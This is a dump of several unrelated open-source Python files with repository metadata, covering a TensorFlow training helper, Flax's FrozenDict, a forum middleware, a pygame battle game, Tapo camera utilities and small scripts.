print('Calculating number of lines in the file...', end=' ') all_samples = nb_lines(path) print(all_samples) self.batch_size = batch_size self.nb_train_samples = int((1 - validation_split) * all_samples) self.nb_valid_samples = all_samples - self.nb_train_samples dataset = tf.data.TextLineDataset(path) self.train_dataset = dataset.take(self.nb_train_samples) self.train_dataset = self.train_dataset.shuffle(10 * batch_size, seed=42, reshuffle_each_iteration=True) self.train_dataset = self.train_dataset.batch(batch_size, drop_remainder=True) self.train_dataset = self.train_dataset.map( lambda b: tf.numpy_function(func=data_processor.process_batch, inp=[b], Tout=['int32', 'int32', 'int32'])) self.train_dataset = self.train_dataset.map(lambda enc_in, dec_in, targ: ((enc_in, dec_in), targ)) self.train_dataset = self.train_dataset.repeat() self.valid_dataset = dataset.skip(self.nb_train_samples) self.valid_dataset = self.valid_dataset.shuffle(10 * batch_size, seed=42, reshuffle_each_iteration=True) self.valid_dataset = self.valid_dataset.batch(batch_size, drop_remainder=True) self.valid_dataset = self.valid_dataset.map( lambda b: tf.numpy_function(func=data_processor.process_batch, inp=[b], Tout=['int32', 'int32', 'int32'])) self.valid_dataset = self.valid_dataset.map(lambda enc_in, dec_in, targ: ((enc_in, dec_in), targ)) self.valid_dataset = self.valid_dataset.repeat() return self def create_model(self, name): arguments = signature(getattr(models, name).__init__) arguments = {k: v.default for k, v in arguments.parameters.items() if v.default is not Parameter.empty and k != 'self'} arguments['nb_symbols'] = len(self.char2int) arg_str = ', '.join([f'{k}=' + str(v) if type(v) != str else f'{k}=' '"' + str(v) + '"' for k, v in arguments.items()]) # print(arg_str) exec(dedent(f''' def create({arg_str}): self.model = {name}(**locals()) return self create.__name__ = {name}.__name__ create.__doc__ = {name}.__init__.__doc__ setattr(self, create.__name__, create) '''), {'self': self, name: getattr(models, name), arg_str: arg_str}) return getattr(self, name) def train(self, epochs: int, monitor_metric='val_acc', patience: int = 5, steps_per_epoch: Union[int, str] = 'auto', validation_steps: Union[int, str] = 'auto', log_dir: str = 'logs', use_multiprocessing: bool = False): pprint(locals()) log_dir = Path(log_dir).joinpath(datetime.now().replace(microsecond=0).isoformat()) model_path = Path(log_dir).joinpath('checkpoints').joinpath('best-model.h5py') model_path = str(model_path) if steps_per_epoch == 'auto': steps_per_epoch = self.nb_train_samples // self.batch_size if validation_steps == 'auto': validation_steps = self.nb_valid_samples // self.batch_size self.model.compile(optimizer='adam', loss='sparse_categorical_crossentropy', metrics=['acc']) history = self.model.fit_generator( self.train_dataset.as_numpy_iterator(), steps_per_epoch=steps_per_epoch, validation_data=self.valid_dataset.as_numpy_iterator(), validation_steps=validation_steps, epochs=epochs, use_multiprocessing=use_multiprocessing, workers=os.cpu_count() - 1, callbacks=[ TerminateOnNaN(), TensorBoard(log_dir=log_dir), ModelCheckpoint(model_path, monitor=monitor_metric, verbose=1, save_best_only=True), EarlyStopping(monitor=monitor_metric, patience=patience), ]) return history.history if __name__ == '__main__': cli = Gym() fire.Fire(cli)
46.943089
118
0.662799
4,977
0.861967
0
0
0
0
0
0
573
0.099238
4c6e61959c8414eed50a9b983937c8b1f9cf4b26
3,711
py
Python
flax/core/frozen_dict.py
juliuskunze/flax
929395cf5c7391bca3e33ef6760ff9591401d19e
[ "Apache-2.0" ]
null
null
null
flax/core/frozen_dict.py
juliuskunze/flax
929395cf5c7391bca3e33ef6760ff9591401d19e
[ "Apache-2.0" ]
null
null
null
flax/core/frozen_dict.py
juliuskunze/flax
929395cf5c7391bca3e33ef6760ff9591401d19e
[ "Apache-2.0" ]
null
null
null
# Copyright 2020 The Flax Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Frozen Dictionary.""" from typing import TypeVar, Mapping, Dict, Tuple from flax import serialization import jax K = TypeVar('K') V = TypeVar('V') @jax.tree_util.register_pytree_node_class class FrozenDict(Mapping[K, V]): """An immutable variant of the Python dict.""" __slots__ = ('_dict', '_hash') def __init__(self, *args, **kwargs): self._dict = dict(*args, **kwargs) self._hash = None def __getitem__(self, key): v = self._dict[key] if isinstance(v, dict): return FrozenDict(v) return v def __setitem__(self, key, value): raise ValueError('FrozenDict is immutable.') def __contains__(self, key): return key in self._dict def __iter__(self): return iter(self._dict) def __len__(self): return len(self._dict) def __repr__(self): return 'FrozenDict(%r)' % self._dict def __hash__(self): if self._hash is None: h = 0 for key, value in self.items(): h ^= hash((key, value)) self._hash = h return self._hash def copy(self, add_or_replace: Mapping[K, V]) -> 'FrozenDict[K, V]': """Create a new FrozenDict with additional or replaced entries.""" return type(self)(self, **unfreeze(add_or_replace)) def items(self): for key in self._dict: yield (key, self[key]) def pop(self, key: K) -> Tuple['FrozenDict[K, V]', V]: """Create a new FrozenDict where one entry is removed. Example:: state, params = variables.pop('params') Args: key: the key to remove from the dict Returns: A pair with the new FrozenDict and the removed value. """ value = self[key] new_dict = dict(self._dict) new_dict.pop(key) new_self = type(self)(new_dict) return new_self, value def unfreeze(self) -> Dict[K, V]: return unfreeze(self) def tree_flatten(self): return (self._dict,), () @classmethod def tree_unflatten(cls, _, data): return cls(*data) def freeze(xs: Dict[K, V]) -> FrozenDict[K, V]: """Freeze a nested dict. Makes a nested `dict` immutable by transforming it into `FrozenDict`. """ # Turn the nested FrozenDict into a dict. This way the internal data structure # of FrozenDict does not contain any FrozenDicts. # instead we create those lazily in `__getitem__`. # As a result tree_flatten/unflatten will be fast # because it operates on native dicts. xs = unfreeze(xs) return FrozenDict(xs) def unfreeze(x: FrozenDict[K, V]) -> Dict[K, V]: """Unfreeze a FrozenDict. Makes a mutable copy of a `FrozenDict` mutable by transforming it into (nested) dict. """ if not isinstance(x, (FrozenDict, dict)): return x ys = {} for key, value in x.items(): ys[key] = unfreeze(value) return ys def _frozen_dict_state_dict(xs): return {key: serialization.to_state_dict(value) for key, value in xs.items()} def _restore_frozen_dict(xs, states): return freeze( {key: serialization.from_state_dict(value, states[key]) for key, value in xs.items()}) serialization.register_serialization_state( FrozenDict, _frozen_dict_state_dict, _restore_frozen_dict)
25.770833
80
0.68041
1,746
0.470493
72
0.019402
1,788
0.481811
0
0
1,542
0.415521
4c72d8c0b48b4984dfd1c6e64ae6bd05f864f9ea
1,273
py
Python
pybb/middleware.py
grigi/pybbm
9ecc5e7fadf4da820d2fc2c22914e14f3545047d
[ "BSD-2-Clause" ]
null
null
null
pybb/middleware.py
grigi/pybbm
9ecc5e7fadf4da820d2fc2c22914e14f3545047d
[ "BSD-2-Clause" ]
null
null
null
pybb/middleware.py
grigi/pybbm
9ecc5e7fadf4da820d2fc2c22914e14f3545047d
[ "BSD-2-Clause" ]
null
null
null
# -*- coding: utf-8 -*- from django.utils import translation from django.db.models import ObjectDoesNotExist from pybb import util from pybb.signals import user_saved class PybbMiddleware(object): def process_request(self, request): if request.user.is_authenticated(): try: # Here we try to load profile, but can get error # if user created during syncdb but profile model # under south control. (Like pybb.Profile). profile = util.get_pybb_profile(request.user) except ObjectDoesNotExist: # Ok, we should create new profile for this user # and grant permissions for add posts user_saved(request.user, created=True) profile = util.get_pybb_profile(request.user) language = translation.get_language_from_request(request) if not profile.language: profile.language = language profile.save() if profile.language and profile.language != language: request.session['django_language'] = profile.language translation.activate(profile.language) request.LANGUAGE_CODE = translation.get_language()
37.441176
69
0.624509
1,101
0.864886
0
0
0
0
0
0
265
0.20817
4c72f9ae2886173a745e73873beb49821cbc3a3f
691
py
Python
streetlite/common/constants.py
s0h3ck/streetlite
21db388702f828417dd3dc0fbfa5af757216e1e0
[ "MIT" ]
null
null
null
streetlite/common/constants.py
s0h3ck/streetlite
21db388702f828417dd3dc0fbfa5af757216e1e0
[ "MIT" ]
1
2021-06-01T22:23:13.000Z
2021-06-01T22:23:13.000Z
streetlite/common/constants.py
s0h3ck/streetlite
21db388702f828417dd3dc0fbfa5af757216e1e0
[ "MIT" ]
null
null
null
from enum import Enum class CustomEnum(Enum): @classmethod def has_value(cls, value): return any(value == item.value for item in cls) @classmethod def from_value(cls, value): found_element = None if cls.has_value(value): found_element = cls(value) return found_element class Direction(CustomEnum): EAST = 0x1 SOUTH = 0x2 WEST = 0x3 NORTH = 0x4 class Action(CustomEnum): FLASH_RED = 0x32 GREEN = 0x33 FLASH_GREEN = 0x34 PEDESTRIAN = 0x35 EMERGENCY = 0x37 class Intersection(CustomEnum): A = 0x62 B = 0x61 BOTH = 0x63 class Mode(CustomEnum): LIVE = 0 SIMULATION = 1
18.675676
55
0.622287
660
0.955137
0
0
275
0.397974
0
0
0
0
4c73a2fb986309ca0a2f6912149adaf74509a6fc
716
py
Python
day5.py
achien/advent-of-code-2021
8851e1727975ea8124db78b54fe577fbf2e5883d
[ "MIT" ]
null
null
null
day5.py
achien/advent-of-code-2021
8851e1727975ea8124db78b54fe577fbf2e5883d
[ "MIT" ]
null
null
null
day5.py
achien/advent-of-code-2021
8851e1727975ea8124db78b54fe577fbf2e5883d
[ "MIT" ]
null
null
null
import fileinput counts = {} for line in fileinput.input(): line = line.strip() p1, p2 = line.split('>') p1 = p1[:-2] x1, y1 = p1.split(',') x1 = int(x1) y1 = int(y1) p2 = p2[1:] x2, y2 = p2.split(',') x2 = int(x2) y2 = int(y2) if x1 == x2: dx = 0 elif x1 > x2: dx = -1 else: dx = 1 if y1 == y2: dy = 0 elif y1 > y2: dy = -1 else: dy = 1 x = x1 y = y1 while True: pt = (x, y) counts[pt] = counts.get(pt, 0) + 1 if x == x2 and y == y2: break x += dx y += dy n = 0 for _, ct in counts.items(): if ct > 1: n += 1 print(n)
15.911111
42
0.391061
0
0
0
0
0
0
0
0
9
0.01257
4c73c6bd43cad4b6997238ea62e6e2c529f20e54
1,635
py
Python
meditation_example.py
sodapopinsky/dfk
be48e89d4b054ad8abbb009d0e1ea4c10f559af5
[ "MIT" ]
90
2021-10-17T19:36:45.000Z
2022-03-31T17:19:43.000Z
meditation_example.py
sodapopinsky/dfk
be48e89d4b054ad8abbb009d0e1ea4c10f559af5
[ "MIT" ]
13
2021-11-13T00:19:31.000Z
2022-03-20T15:13:22.000Z
meditation_example.py
sodapopinsky/dfk
be48e89d4b054ad8abbb009d0e1ea4c10f559af5
[ "MIT" ]
71
2021-11-05T03:00:41.000Z
2022-03-30T06:16:25.000Z
import logging from web3 import Web3 import sys import time import meditation.meditation as meditation if __name__ == "__main__": log_format = '%(asctime)s|%(name)s|%(levelname)s: %(message)s' logger = logging.getLogger("DFK-meditation") logger.setLevel(logging.DEBUG) logging.basicConfig(level=logging.INFO, format=log_format, stream=sys.stdout) rpc_server = 'https://api.harmony.one' logger.info("Using RPC server " + rpc_server) private_key = None # set private key account_address = '0x2E7669F61eA77F02445A015FBdcFe2DE47083E02' gas_price_gwei = 10 tx_timeout_seconds = 30 w3 = Web3(Web3.HTTPProvider(rpc_server)) active_meditations = meditation.get_active_meditations(account_address, rpc_server) logger.info("Pending meditation on address " + str(account_address) + ": "+str(active_meditations)) level = 1 hero_id = 1 required_runes = meditation.get_required_runes(level, rpc_server) meditation.start_meditation(1, meditation.stat2id('strength'), meditation.stat2id('endurance'), meditation.stat2id('luck'), meditation.ZERO_ADDRESS, private_key, w3.eth.getTransactionCount(account_address), gas_price_gwei, tx_timeout_seconds, rpc_server, logger) hero_meditation = meditation.get_hero_meditation(hero_id, rpc_server) logger.info("Pending meditation "+str(hero_meditation)) time.sleep(5) meditation.complete_meditation(hero_id, private_key, w3.eth.getTransactionCount(account_address), gas_price_gwei, tx_timeout_seconds, rpc_server, logger)
41.923077
127
0.720489
0
0
0
0
0
0
0
0
264
0.161468
4c752c3e0e33ba7c7da469ab66cb6adfa9bb958a
669
py
Python
python/johnstarich/interval.py
JohnStarich/dotfiles
eaa07b09aa02fc2fa2516cebdd3628b4daf506e4
[ "Apache-2.0" ]
3
2018-02-28T14:22:53.000Z
2022-01-24T02:38:22.000Z
python/johnstarich/interval.py
JohnStarich/dotfiles
eaa07b09aa02fc2fa2516cebdd3628b4daf506e4
[ "Apache-2.0" ]
null
null
null
python/johnstarich/interval.py
JohnStarich/dotfiles
eaa07b09aa02fc2fa2516cebdd3628b4daf506e4
[ "Apache-2.0" ]
null
null
null
import time class Interval(object): def __init__(self, delay_time: int): self.delay_time = delay_time self.current_time = 0 @staticmethod def now(): return time.gmtime().tm_sec def should_run(self) -> bool: if self.current_time == 0: self.current_time = Interval.now() return True return self.is_done() def is_done(self) -> bool: timestamp = Interval.now() return self.current_time + self.delay_time < timestamp or \ self.current_time > timestamp def start(self) -> int: self.current_time = Interval.now() return self.current_time
24.777778
67
0.606876
654
0.977578
0
0
64
0.095665
0
0
0
0
4c76367fcd11568b786d20b9e43e17b970ff6e48
2,329
py
Python
servers/python/coweb/bot/wrapper/object.py
opencoweb/coweb
7b3a87ee9eda735a859447d404ee16edde1c5671
[ "AFL-2.1" ]
83
2015-01-05T19:02:57.000Z
2021-11-19T02:48:09.000Z
servers/python/coweb/bot/wrapper/object.py
xuelingxiao/coweb
7b3a87ee9eda735a859447d404ee16edde1c5671
[ "AFL-2.1" ]
3
2015-12-16T13:49:33.000Z
2019-06-17T13:38:50.000Z
servers/python/coweb/bot/wrapper/object.py
xuelingxiao/coweb
7b3a87ee9eda735a859447d404ee16edde1c5671
[ "AFL-2.1" ]
14
2015-04-29T22:36:53.000Z
2021-11-18T03:24:29.000Z
''' Copyright (c) The Dojo Foundation 2011. All Rights Reserved. Copyright (c) IBM Corporation 2008, 2011. All Rights Reserved. ''' # tornado import tornado.ioloop # std lib import logging import time import weakref import functools # coweb from .base import BotWrapperBase log = logging.getLogger('coweb.bot') class ObjectBotWrapper(BotWrapperBase): def __init__(self, manager, botClass, serviceName, serviceToken, appData): self.serviceName = serviceName self.appData = appData self._serviceToken = serviceToken self._manager = weakref.proxy(manager) self._bot = botClass(self, serviceName, appData) self._ioLoop = tornado.ioloop.IOLoop.instance() # asynchronously inform local manager we're ready self.add_callback(self._manager.on_bot_ready, serviceName, serviceToken, self) def on_message(self, mtdName, *args): '''Proxy messages from manager to bot impl.''' try: mtd = getattr(self._bot, mtdName) except AttributeError: # bot isn't listening for this message type return # keep sync with manager so we can catch exceptions, else exception # fires in context of original request which is wrong, it's a bot # error not a client error try: mtd(*args) except Exception: log.exception('bot error') def reply(self, replyToken, data): '''Sends a private reply to a requestor.''' self._manager.on_bot_response(self.serviceName, replyToken, data) def publish(self, data): '''Sends a public reply to subscribes on a bot subchannel.''' self._manager.on_bot_publish(self.serviceName, data) def add_callback(self, callback, *args, **kwargs): '''Schedule a callback in the main loop.''' f = functools.partial(callback, *args, **kwargs) self._ioLoop.add_callback(f) def add_timer(self, delay, callback, *args, **kwargs): '''Add a one-shot timer that schedules a main loop callback.''' f = functools.partial(callback, *args, **kwargs) return self._ioLoop.add_timeout(time.time() + delay, f) def remove_timer(self, timer): '''Remove a one-shot timer.''' self._ioLoop.remove_timeout(timer)
35.287879
78
0.653499
2,015
0.865178
0
0
0
0
0
0
715
0.306999
4c76baa8499aec4813a3d47e851bd3cbe62268bf
6,193
py
Python
battle_tut5.py
lankotiAditya/RPG_battle_main
0063941d023ff1c18a6b050fab4d0c7ec583b11a
[ "MIT" ]
22
2021-01-13T10:21:42.000Z
2022-03-10T00:06:05.000Z
battle_tut5.py
lankotiAditya/RPG_battle_main
0063941d023ff1c18a6b050fab4d0c7ec583b11a
[ "MIT" ]
1
2021-01-14T17:02:41.000Z
2021-01-14T20:23:38.000Z
battle_tut5.py
lankotiAditya/RPG_battle_main
0063941d023ff1c18a6b050fab4d0c7ec583b11a
[ "MIT" ]
33
2021-01-17T08:52:38.000Z
2022-03-28T10:36:36.000Z
import pygame import random pygame.init() clock = pygame.time.Clock() fps = 60 #game window bottom_panel = 150 screen_width = 800 screen_height = 400 + bottom_panel screen = pygame.display.set_mode((screen_width, screen_height)) pygame.display.set_caption('Battle') #define game variables current_fighter = 1 total_fighters = 3 action_cooldown = 0 action_wait_time = 90 attack = False potion = False clicked = False #define fonts font = pygame.font.SysFont('Times New Roman', 26) #define colours red = (255, 0, 0) green = (0, 255, 0) #load images #background image background_img = pygame.image.load('img/Background/background.png').convert_alpha() #panel image panel_img = pygame.image.load('img/Icons/panel.png').convert_alpha() #sword image sword_img = pygame.image.load('img/Icons/sword.png').convert_alpha() #create function for drawing text def draw_text(text, font, text_col, x, y): img = font.render(text, True, text_col) screen.blit(img, (x, y)) #function for drawing background def draw_bg(): screen.blit(background_img, (0, 0)) #function for drawing panel def draw_panel(): #draw panel rectangle screen.blit(panel_img, (0, screen_height - bottom_panel)) #show knight stats draw_text(f'{knight.name} HP: {knight.hp}', font, red, 100, screen_height - bottom_panel + 10) for count, i in enumerate(bandit_list): #show name and health draw_text(f'{i.name} HP: {i.hp}', font, red, 550, (screen_height - bottom_panel + 10) + count * 60) #fighter class class Fighter(): def __init__(self, x, y, name, max_hp, strength, potions): self.name = name self.max_hp = max_hp self.hp = max_hp self.strength = strength self.start_potions = potions self.potions = potions self.alive = True self.animation_list = [] self.frame_index = 0 self.action = 0#0:idle, 1:attack, 2:hurt, 3:dead self.update_time = pygame.time.get_ticks() #load idle images temp_list = [] for i in range(8): img = pygame.image.load(f'img/{self.name}/Idle/{i}.png') img = pygame.transform.scale(img, (img.get_width() * 3, img.get_height() * 3)) temp_list.append(img) self.animation_list.append(temp_list) #load attack images temp_list = [] for i in range(8): img = pygame.image.load(f'img/{self.name}/Attack/{i}.png') img = pygame.transform.scale(img, (img.get_width() * 3, img.get_height() * 3)) temp_list.append(img) self.animation_list.append(temp_list) self.image = self.animation_list[self.action][self.frame_index] self.rect = self.image.get_rect() self.rect.center = (x, y) def update(self): animation_cooldown = 100 #handle animation #update image self.image = self.animation_list[self.action][self.frame_index] #check if enough time has passed since the last update if pygame.time.get_ticks() - self.update_time > animation_cooldown: self.update_time = pygame.time.get_ticks() self.frame_index += 1 #if the animation has run out then reset back to the start if self.frame_index >= len(self.animation_list[self.action]): self.idle() def idle(self): #set variables to attack animation self.action = 0 self.frame_index = 0 self.update_time = pygame.time.get_ticks() def attack(self, target): #deal damage to enemy rand = random.randint(-5, 5) damage = self.strength + rand target.hp -= damage #check if target has died if target.hp < 1: target.hp = 0 target.alive = False #set variables to attack animation self.action = 1 self.frame_index = 0 self.update_time = pygame.time.get_ticks() def draw(self): screen.blit(self.image, self.rect) class HealthBar(): def __init__(self, x, y, hp, max_hp): self.x = x self.y = y self.hp = hp self.max_hp = max_hp def draw(self, hp): #update with new health self.hp = hp #calculate health ratio ratio = self.hp / self.max_hp pygame.draw.rect(screen, red, (self.x, self.y, 150, 20)) pygame.draw.rect(screen, green, (self.x, self.y, 150 * ratio, 20)) knight = Fighter(200, 260, 'Knight', 30, 10, 3) bandit1 = Fighter(550, 270, 'Bandit', 20, 6, 1) bandit2 = Fighter(700, 270, 'Bandit', 20, 6, 1) bandit_list = [] bandit_list.append(bandit1) bandit_list.append(bandit2) knight_health_bar = HealthBar(100, screen_height - bottom_panel + 40, knight.hp, knight.max_hp) bandit1_health_bar = HealthBar(550, screen_height - bottom_panel + 40, bandit1.hp, bandit1.max_hp) bandit2_health_bar = HealthBar(550, screen_height - bottom_panel + 100, bandit2.hp, bandit2.max_hp) run = True while run: clock.tick(fps) #draw background draw_bg() #draw panel draw_panel() knight_health_bar.draw(knight.hp) bandit1_health_bar.draw(bandit1.hp) bandit2_health_bar.draw(bandit2.hp) #draw fighters knight.update() knight.draw() for bandit in bandit_list: bandit.update() bandit.draw() #control player actions #reset action variables attack = False potion = False target = None #make sure mouse is visible pygame.mouse.set_visible(True) pos = pygame.mouse.get_pos() for count, bandit in enumerate(bandit_list): if bandit.rect.collidepoint(pos): #hide mouse pygame.mouse.set_visible(False) #show sword in place of mouse cursor screen.blit(sword_img, pos) if clicked == True: attack = True target = bandit_list[count] #player action if knight.alive == True: if current_fighter == 1: action_cooldown += 1 if action_cooldown >= action_wait_time: #look for player action #attack if attack == True and target != None: knight.attack(target) current_fighter += 1 action_cooldown = 0 #enemy action for count, bandit in enumerate(bandit_list): if current_fighter == 2 + count: if bandit.alive == True: action_cooldown += 1 if action_cooldown >= action_wait_time: #attack bandit.attack(knight) current_fighter += 1 action_cooldown = 0 else: current_fighter += 1 #if all fighters have had a turn then reset if current_fighter > total_fighters: current_fighter = 1 for event in pygame.event.get(): if event.type == pygame.QUIT: run = False if event.type == pygame.MOUSEBUTTONDOWN: clicked = True else: clicked = False pygame.display.update() pygame.quit()
23.911197
101
0.707089
2,459
0.397061
0
0
0
0
0
0
1,160
0.187308
4c791be103564830f1d4250200840c0dccc964ac
651
py
Python
curso_em_video/0087a.py
marinaoliveira96/python-exercises
13fc0ec30dec9bb6531cdeb41c80726971975835
[ "MIT" ]
null
null
null
curso_em_video/0087a.py
marinaoliveira96/python-exercises
13fc0ec30dec9bb6531cdeb41c80726971975835
[ "MIT" ]
null
null
null
curso_em_video/0087a.py
marinaoliveira96/python-exercises
13fc0ec30dec9bb6531cdeb41c80726971975835
[ "MIT" ]
null
null
null
matriz = [[0, 0, 0], [0, 0, 0], [0, 0, 0]] soma = col3 = maior = 0 for l in range(0, 3): for c in range(0, 3): matriz[l][c] = int(input(f'[{l}][{c}]: ')) for l in range(0, 3): for c in range(0, 3): print(f'[{matriz[l][c]:^5}]', end='') if matriz[l][c] % 2 == 0: soma += matriz[l][c] print() for l in range(0, 3): col3 += matriz[l][2] for c in range(0, 3): if c == 0: maior = matriz[1][c] elif matriz[1][c] > maior: maior = matriz[1][c] print(f'A soma dos numeros pares é {soma}') print(f'A soma dos valores da 3 coluna é {col3}') print(f'O maior numero da 2 linha é {maior}')
31
50
0.506912
0
0
0
0
0
0
0
0
158
0.24159
4c79ab828e049f734329ac9fd7817c526a06676d
6,777
py
Python
custom_components/tapo_control/utils.py
david-kalbermatten/HomeAssistant-Tapo-Control
3f9f8316cf7e176bb6f8d798d709f3c6d346a527
[ "Apache-2.0" ]
null
null
null
custom_components/tapo_control/utils.py
david-kalbermatten/HomeAssistant-Tapo-Control
3f9f8316cf7e176bb6f8d798d709f3c6d346a527
[ "Apache-2.0" ]
null
null
null
custom_components/tapo_control/utils.py
david-kalbermatten/HomeAssistant-Tapo-Control
3f9f8316cf7e176bb6f8d798d709f3c6d346a527
[ "Apache-2.0" ]
null
null
null
import onvif import os import asyncio import urllib.parse from onvif import ONVIFCamera from pytapo import Tapo from .const import ENABLE_MOTION_SENSOR, DOMAIN, LOGGER, CLOUD_PASSWORD from homeassistant.const import CONF_IP_ADDRESS, CONF_USERNAME, CONF_PASSWORD from homeassistant.components.onvif.event import EventManager from homeassistant.components.ffmpeg import DATA_FFMPEG from haffmpeg.tools import IMAGE_JPEG, ImageFrame def registerController(host, username, password): return Tapo(host, username, password) async def isRtspStreamWorking(hass, host, username, password): _ffmpeg = hass.data[DATA_FFMPEG] ffmpeg = ImageFrame(_ffmpeg.binary, loop=hass.loop) username = urllib.parse.quote_plus(username) password = urllib.parse.quote_plus(password) streaming_url = f"rtsp://{username}:{password}@{host}:554/stream1" image = await asyncio.shield( ffmpeg.get_image( streaming_url, output_format=IMAGE_JPEG, ) ) return not image == b"" async def initOnvifEvents(hass, host, username, password): device = ONVIFCamera( host, 2020, username, password, f"{os.path.dirname(onvif.__file__)}/wsdl/", no_cache=True, ) try: await device.update_xaddrs() device_mgmt = device.create_devicemgmt_service() device_info = await device_mgmt.GetDeviceInformation() if "Manufacturer" not in device_info: raise Exception("Onvif connection has failed.") return device except Exception: pass return False async def getCamData(hass, controller): camData = {} presets = await hass.async_add_executor_job(controller.isSupportingPresets) camData["user"] = controller.user camData["basic_info"] = await hass.async_add_executor_job(controller.getBasicInfo) camData["basic_info"] = camData["basic_info"]["device_info"]["basic_info"] try: motionDetectionData = await hass.async_add_executor_job( controller.getMotionDetection ) motion_detection_enabled = motionDetectionData["enabled"] if motionDetectionData["digital_sensitivity"] == "20": motion_detection_sensitivity = "low" elif motionDetectionData["digital_sensitivity"] == "50": motion_detection_sensitivity = "normal" elif motionDetectionData["digital_sensitivity"] == "80": motion_detection_sensitivity = "high" else: motion_detection_sensitivity = None except Exception: motion_detection_enabled = None motion_detection_sensitivity = None camData["motion_detection_enabled"] = motion_detection_enabled camData["motion_detection_sensitivity"] = motion_detection_sensitivity try: privacy_mode = await hass.async_add_executor_job(controller.getPrivacyMode) privacy_mode = privacy_mode["enabled"] except Exception: privacy_mode = None camData["privacy_mode"] = privacy_mode try: alarmData = await hass.async_add_executor_job(controller.getAlarm) alarm = alarmData["enabled"] alarm_mode = alarmData["alarm_mode"] except Exception: alarm = None alarm_mode = None camData["alarm"] = alarm camData["alarm_mode"] = alarm_mode try: commonImageData = await hass.async_add_executor_job(controller.getCommonImage) day_night_mode = commonImageData["image"]["common"]["inf_type"] except Exception: day_night_mode = None camData["day_night_mode"] = day_night_mode try: led = await hass.async_add_executor_job(controller.getLED) led = led["enabled"] except Exception: led = None camData["led"] = led try: auto_track = await hass.async_add_executor_job(controller.getAutoTrackTarget) auto_track = auto_track["enabled"] except Exception: auto_track = None camData["auto_track"] = auto_track if presets: camData["presets"] = presets else: camData["presets"] = {} return camData async def update_listener(hass, entry): """Handle options update.""" host = entry.data.get(CONF_IP_ADDRESS) username = entry.data.get(CONF_USERNAME) password = entry.data.get(CONF_PASSWORD) motionSensor = entry.data.get(ENABLE_MOTION_SENSOR) cloud_password = entry.data.get(CLOUD_PASSWORD) try: if cloud_password != "": tapoController = await hass.async_add_executor_job( registerController, host, "admin", cloud_password ) else: tapoController = await hass.async_add_executor_job( registerController, host, username, password ) hass.data[DOMAIN][entry.entry_id]["controller"] = tapoController except Exception: LOGGER.error( "Authentication to Tapo camera failed." + " Please restart the camera and try again." ) for entity in hass.data[DOMAIN][entry.entry_id]["entities"]: entity._host = host entity._username = username entity._password = password if hass.data[DOMAIN][entry.entry_id]["events"]: await hass.data[DOMAIN][entry.entry_id]["events"].async_stop() if hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"]: await hass.config_entries.async_forward_entry_unload(entry, "binary_sensor") hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"] = False if motionSensor: await setupOnvif(hass, entry, host, username, password) async def setupOnvif(hass, entry, host, username, password): hass.data[DOMAIN][entry.entry_id]["eventsDevice"] = await initOnvifEvents( hass, host, username, password ) if hass.data[DOMAIN][entry.entry_id]["eventsDevice"]: hass.data[DOMAIN][entry.entry_id]["events"] = EventManager( hass, hass.data[DOMAIN][entry.entry_id]["eventsDevice"], f"{entry.entry_id}_tapo_events", ) hass.data[DOMAIN][entry.entry_id]["eventsSetup"] = await setupEvents( hass, entry ) async def setupEvents(hass, entry): if not hass.data[DOMAIN][entry.entry_id]["events"].started: events = hass.data[DOMAIN][entry.entry_id]["events"] if await events.async_start(): if not hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"]: hass.data[DOMAIN][entry.entry_id]["motionSensorCreated"] = True hass.async_create_task( hass.config_entries.async_forward_entry_setup( entry, "binary_sensor" ) ) return True else: return False
34.93299
86
0.665044
0
0
0
0
0
0
6,235
0.920024
903
0.133245
4c79db5803090229f5cee46e595e5f692bd63c32
1,652
py
Python
camd3/infrastructure/component/tests/test_uidattr.py
mamrhein/CAmD3
d20f62295771a297c3fbb314beef314e5ec7a2b5
[ "BSD-2-Clause" ]
null
null
null
camd3/infrastructure/component/tests/test_uidattr.py
mamrhein/CAmD3
d20f62295771a297c3fbb314beef314e5ec7a2b5
[ "BSD-2-Clause" ]
null
null
null
camd3/infrastructure/component/tests/test_uidattr.py
mamrhein/CAmD3
d20f62295771a297c3fbb314beef314e5ec7a2b5
[ "BSD-2-Clause" ]
null
null
null
#!/usr/bin/env python3 # -*- coding: utf-8 -*- # ---------------------------------------------------------------------------- # Name: test_uidattr # Purpose: Test driver for module 'uidattr' # # Author: Michael Amrhein ([email protected]) # # Copyright: (c) 2018 Michael Amrhein # ---------------------------------------------------------------------------- # $Source$ # $Revision$ """Test driver for module 'uidattr'""" import unittest from uuid import uuid1 from camd3.infrastructure.component import ( Component, register_utility, UniqueIdAttribute) from camd3.infrastructure.component.idfactories import ( UUIDGenerator, uuid_generator) # factory for UUIDs def custom_uuid_generator() -> UUIDGenerator: # noqa: D103 while True: yield uuid1() class ExplID(Component): id = UniqueIdAttribute(uid_gen=custom_uuid_generator()) def __init__(self): self.__class__.id.set_once(self) class ImplID(Component): id = UniqueIdAttribute() def __init__(self): self.__class__.id.set_once(self) class UniqueIdAttributeTest(unittest.TestCase): def setUp(self): register_utility(uuid_generator(), UUIDGenerator) self.cid = ImplID() def test_init(self): cid = ImplID() self.assertIsNotNone(cid.id) self.assertIsNotNone(cid._id) def test_uniqueness(self): ids = {self.cid.id} for i in range(10): cid = ExplID() self.assertNotIn(cid.id, ids) ids.add(cid.id) if __name__ == '__main__': # pragma: no cover unittest.main()
23.6
78
0.578087
735
0.444915
114
0.069007
0
0
0
0
487
0.294794
4c7a9873c160d856f0a448855b2b79215e8191fc
883
py
Python
s.py
tn012604409/HW3_chatRobot
97762e53bfccd8b30c6b263792919c679e53b404
[ "MIT" ]
null
null
null
s.py
tn012604409/HW3_chatRobot
97762e53bfccd8b30c6b263792919c679e53b404
[ "MIT" ]
null
null
null
s.py
tn012604409/HW3_chatRobot
97762e53bfccd8b30c6b263792919c679e53b404
[ "MIT" ]
null
null
null
